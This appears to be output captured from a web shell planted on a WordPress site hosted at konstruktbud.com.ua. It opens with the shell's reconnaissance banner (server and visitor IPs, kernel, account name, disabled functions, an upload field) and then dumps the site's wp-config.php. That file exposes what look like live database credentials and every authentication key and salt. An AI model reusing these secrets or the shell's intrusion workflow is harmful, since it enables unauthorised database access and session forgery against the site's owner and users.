| Server IP : 185.68.16.147 / Your IP : 216.73.216.182 Web Server : Apache System : Linux web789.default-host.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64 User : jt292766 ( 1182) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/jt292766/konstruktbud.com.ua/www/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'jt292766_konstrukt' );
/** MySQL database username */
define( 'DB_USER', 'jt292766_konstrukt' );
/** MySQL database password */
define( 'DB_PASSWORD', 'hG6kjO0oA4goG6frF3ar' );
/** MySQL hostname */
define( 'DB_HOST', 'jt292766.mysql.tools' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'mt,+91xLjePgz_J#-}1 |qpKK2ER$/c+J}{V!]^[J*sHDeSD&`C&}5zh./R_jBi}' );
define( 'SECURE_AUTH_KEY', 'yod-;@ YAP<MHN&w9#O0i}Ubh1|j<v-dq!Y9eC1T_.eYmj~FzDS?C<m~)2Qtc-O=' );
define( 'LOGGED_IN_KEY', 'G%!ub/PN`jCr9:TY5DKrCj~vcFv3dFM0tO3I6`~n9mww8ADh+Bt{hgYLpr3KinWu' );
define( 'NONCE_KEY', 'Z z@3z5lnog[^,?8!t[e-^1vnW2ESDHg8>N8r_~y{Dm qSgx(B>AhD?+:].rX`V+' );
define( 'AUTH_SALT', '[_&JK?8.o_P{UP~xw8-`V 8_PzfADdZnYZRE6oNDQJLi(0&y70 u%f!Pp~!X]_)p' );
define( 'SECURE_AUTH_SALT', 'Td1ioh2F{!G~0{zKZqwFYwMx1<QLXhC>qV)TO-1)`-DLFRTW+[oeqYJmPgR&+,-o' );
define( 'LOGGED_IN_SALT', 's2q?bx; Xl*-vpXLs `)Bz^5E&#Z3{k_clsCg7<)- =0}le3Fc3S/thvJrGk`Z.]' );
define( 'NONCE_SALT', 'gjND<rq#]_6WaKj.ZM[C<IQ$Xsq[Ml{|,%9Zp,i/c-!17{lI*@5baKT@#kM{?4V}' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';